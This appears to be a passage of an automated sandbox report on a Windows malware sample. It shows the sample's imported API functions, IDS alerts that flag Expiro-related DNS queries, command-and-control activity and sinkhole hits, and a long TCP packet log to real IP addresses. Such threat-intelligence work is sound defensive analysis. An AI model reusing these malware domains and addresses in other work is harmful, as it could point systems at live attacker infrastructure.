TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                                                                                                                USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                                                                                                                GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                                                                                                                COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                                                                                                                SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                                                ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                                                                                OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                                                                                                                                Possible Origin

                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                EnglishGreat Britain

                                                                                                                                                                Network Behavior

                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                2024-11-28T12:11:59.186207+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.22498818.8.8.853UDP
                                                                                                                                                                2024-11-28T12:11:59.256622+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.2249168TCP
                                                                                                                                                                2024-11-28T12:11:59.256622+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.2249168TCP
                                                                                                                                                                2024-11-28T12:12:04.812989+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.22527818.8.8.853UDP
                                                                                                                                                                2024-11-28T12:13:38.589710+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.224917647.129.31.21280TCP
                                                                                                                                                                2024-11-28T12:13:38.712649+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.2249176TCP
                                                                                                                                                                2024-11-28T12:13:38.712649+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.2249176TCP
                                                                                                                                                                2024-11-28T12:13:40.919269+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.2249177TCP
                                                                                                                                                                2024-11-28T12:13:40.919269+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.2249177TCP
                                                                                                                                                                2024-11-28T12:13:45.265069+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.2249179TCP
                                                                                                                                                                2024-11-28T12:13:45.265069+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.2249179TCP
                                                                                                                                                                2024-11-28T12:13:49.618320+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.246.200.16080192.168.2.2249182TCP
                                                                                                                                                                2024-11-28T12:13:49.618320+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.246.200.16080192.168.2.2249182TCP
                                                                                                                                                                2024-11-28T12:13:51.584461+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.2249183TCP
                                                                                                                                                                2024-11-28T12:13:51.584461+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.2249183TCP
                                                                                                                                                                2024-11-28T12:14:05.039850+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.2249187TCP
                                                                                                                                                                2024-11-28T12:14:05.039850+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.2249187TCP
                                                                                                                                                                2024-11-28T12:14:06.755681+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz135.164.78.20080192.168.2.2249188TCP
                                                                                                                                                                2024-11-28T12:14:06.755681+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst135.164.78.20080192.168.2.2249188TCP
                                                                                                                                                                2024-11-28T12:14:08.144025+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.2249189TCP
                                                                                                                                                                2024-11-28T12:14:08.144025+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.2249189TCP
                                                                                                                                                                2024-11-28T12:14:14.311753+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.246.231.12080192.168.2.2249196TCP
                                                                                                                                                                2024-11-28T12:14:14.311753+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.246.231.12080192.168.2.2249196TCP

                                                                                                                                                                Network Port Distribution

                                                                                                                                                                TCP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Nov 28, 2024 12:11:51.921605110 CET4916380192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:11:51.931047916 CET4916480192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:11:52.041682005 CET804916354.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:52.041776896 CET4916380192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:11:52.049103975 CET4916380192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:11:52.049149990 CET4916380192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:11:52.051085949 CET804916454.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:52.051266909 CET4916480192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:11:52.053747892 CET4916480192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:11:52.053747892 CET4916480192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:11:52.169158936 CET804916354.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:52.169186115 CET804916354.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:52.173810959 CET804916454.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:52.173820972 CET804916454.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:53.408859968 CET804916454.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:53.408965111 CET804916454.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:53.409126997 CET4916480192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:11:53.410072088 CET4916480192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:11:53.445842981 CET804916354.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:53.445935011 CET804916354.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:53.445991039 CET4916380192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:11:53.465167046 CET4916380192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:11:53.530204058 CET804916454.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:53.587500095 CET804916354.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:53.607706070 CET4916580192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:11:53.672868967 CET4916680192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:11:53.728588104 CET804916518.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:53.728646040 CET4916580192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:11:53.728768110 CET4916580192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:11:53.728799105 CET4916580192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:11:53.793143034 CET804916618.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:53.793191910 CET4916680192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:11:53.793314934 CET4916680192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:11:53.793332100 CET4916680192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:11:53.848670006 CET804916518.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:53.848683119 CET804916518.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:53.913220882 CET804916618.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:53.913269043 CET804916618.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:55.365838051 CET4916580192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:11:55.782172918 CET804916618.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:55.782280922 CET4916680192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:11:55.782979965 CET804916618.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:55.783027887 CET4916680192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:11:55.902431011 CET804916618.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:55.925179005 CET4916780192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:11:56.045676947 CET804916754.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:56.047384977 CET4916780192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:11:56.047502041 CET4916780192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:11:56.047527075 CET4916780192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:11:56.167534113 CET804916754.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:56.167551994 CET804916754.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:57.410089970 CET804916754.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:57.410139084 CET804916754.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:57.410207033 CET4916780192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:11:57.410315990 CET4916780192.168.2.2254.244.188.177
                                                                                                                                                                Nov 28, 2024 12:11:57.530265093 CET804916754.244.188.177192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:57.643866062 CET4916880192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:11:57.764548063 CET804916844.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:57.765393972 CET4916880192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:11:57.867679119 CET4916880192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:11:57.867697954 CET4916880192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:11:57.987678051 CET804916844.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:57.987715960 CET804916844.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:58.960014105 CET804916844.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:58.960059881 CET804916844.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:58.960108042 CET4916880192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:11:59.136543989 CET4916880192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:11:59.256622076 CET804916844.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:59.322465897 CET4916980192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:11:59.443047047 CET8049169172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:59.443110943 CET4916980192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:11:59.443458080 CET4916980192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:11:59.443593025 CET4916980192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:11:59.563446999 CET8049169172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:11:59.563611031 CET8049169172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:02.653353930 CET8049169172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:02.653424025 CET4916980192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:12:02.838929892 CET4916980192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:12:02.959556103 CET8049169172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:03.377630949 CET4917080192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:12:03.497701883 CET8049170172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:03.497772932 CET4917080192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:12:03.497939110 CET4917080192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:12:03.497953892 CET4917080192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:12:03.618161917 CET8049170172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:03.618172884 CET8049170172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:04.676234961 CET8049170172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:04.676282883 CET4917080192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:12:04.676335096 CET4917080192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:12:04.799190998 CET8049170172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:04.949651957 CET4917180192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:12:05.069585085 CET804917118.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:05.069638968 CET4917180192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:12:05.069866896 CET4917180192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:12:05.069896936 CET4917180192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:12:05.189901114 CET804917118.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:05.189940929 CET804917118.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:07.188550949 CET804917118.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:07.188658953 CET4917180192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:12:07.188720942 CET804917118.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:07.188761950 CET4917180192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:12:07.308701992 CET804917118.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:07.601902008 CET4917280192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:12:07.721873999 CET804917282.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:07.721924067 CET4917280192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:12:07.722009897 CET4917280192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:12:07.722022057 CET4917280192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:12:07.842012882 CET804917282.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:07.842025042 CET804917282.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:29.652719975 CET804917282.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:29.652780056 CET4917280192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:12:29.652900934 CET4917280192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:12:29.671364069 CET4917380192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:12:29.773561954 CET804917282.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:29.792404890 CET804917382.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:29.792470932 CET4917380192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:12:29.792757034 CET4917380192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:12:29.792785883 CET4917380192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:12:29.912834883 CET804917382.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:29.912847996 CET804917382.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:51.722177029 CET804917382.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:51.722254992 CET4917380192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:12:51.724642038 CET4917380192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:12:51.844660044 CET804917382.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:52.056631088 CET4917480192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:12:52.176600933 CET804917482.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:52.176652908 CET4917480192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:12:52.176826000 CET4917480192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:12:52.177009106 CET4917480192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:12:52.296870947 CET804917482.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:12:52.297034979 CET804917482.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:14.104649067 CET804917482.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:14.104820013 CET4917480192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:13:14.155978918 CET4917580192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:13:14.224860907 CET804917482.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:14.276052952 CET804917582.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:14.276109934 CET4917580192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:13:14.276232004 CET4917580192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:13:14.276252985 CET4917580192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:13:14.396188021 CET804917582.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:14.396200895 CET804917582.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:36.206341028 CET804917582.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:36.206403017 CET4917580192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:13:36.206439018 CET4917580192.168.2.2282.112.184.197
                                                                                                                                                                Nov 28, 2024 12:13:36.326407909 CET804917582.112.184.197192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:36.394376040 CET4917680192.168.2.2247.129.31.212
                                                                                                                                                                Nov 28, 2024 12:13:36.514379025 CET804917647.129.31.212192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:36.514480114 CET4917680192.168.2.2247.129.31.212
                                                                                                                                                                Nov 28, 2024 12:13:36.522104979 CET4917680192.168.2.2247.129.31.212
                                                                                                                                                                Nov 28, 2024 12:13:36.522145033 CET4917680192.168.2.2247.129.31.212
                                                                                                                                                                Nov 28, 2024 12:13:36.642146111 CET804917647.129.31.212192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:36.642157078 CET804917647.129.31.212192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:38.589637041 CET804917647.129.31.212192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:38.589668036 CET804917647.129.31.212192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:38.589709997 CET4917680192.168.2.2247.129.31.212
                                                                                                                                                                Nov 28, 2024 12:13:38.592606068 CET4917680192.168.2.2247.129.31.212
                                                                                                                                                                Nov 28, 2024 12:13:38.712649107 CET804917647.129.31.212192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:38.775875092 CET4917780192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:13:38.897790909 CET804917713.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:38.897851944 CET4917780192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:13:38.898021936 CET4917780192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:13:38.898042917 CET4917780192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:13:39.018021107 CET804917713.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:39.018059015 CET804917713.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:40.919090986 CET804917713.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:40.919250011 CET4917780192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:13:40.919269085 CET804917713.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:40.919332981 CET4917780192.168.2.2213.251.16.150
                                                                                                                                                                Nov 28, 2024 12:13:41.039496899 CET804917713.251.16.150192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:41.575319052 CET4917880192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:13:41.695344925 CET804917844.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:41.695437908 CET4917880192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:13:41.697468996 CET4917880192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:13:41.697479010 CET4917880192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:13:41.817478895 CET804917844.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:41.817503929 CET804917844.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:42.839821100 CET804917844.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:42.839946985 CET804917844.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:42.840004921 CET4917880192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:13:42.842756033 CET4917880192.168.2.2244.221.84.105
                                                                                                                                                                Nov 28, 2024 12:13:42.962903023 CET804917844.221.84.105192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:42.998059988 CET4917980192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:13:43.118283033 CET804917918.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:43.118355989 CET4917980192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:13:43.118539095 CET4917980192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:13:43.118582010 CET4917980192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:13:43.238720894 CET804917918.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:43.238732100 CET804917918.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:45.145045996 CET804917918.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:45.145164013 CET804917918.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:45.145173073 CET4917980192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:13:45.145230055 CET4917980192.168.2.2218.141.10.107
                                                                                                                                                                Nov 28, 2024 12:13:45.265069008 CET804917918.141.10.107192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:45.302890062 CET4918080192.168.2.22172.234.222.143
                                                                                                                                                                Nov 28, 2024 12:13:45.423063040 CET8049180172.234.222.143192.168.2.22
                                                                                                                                                                Nov 28, 2024 12:13:45.423124075 CET4918080192.168.2.22172.234.222.143
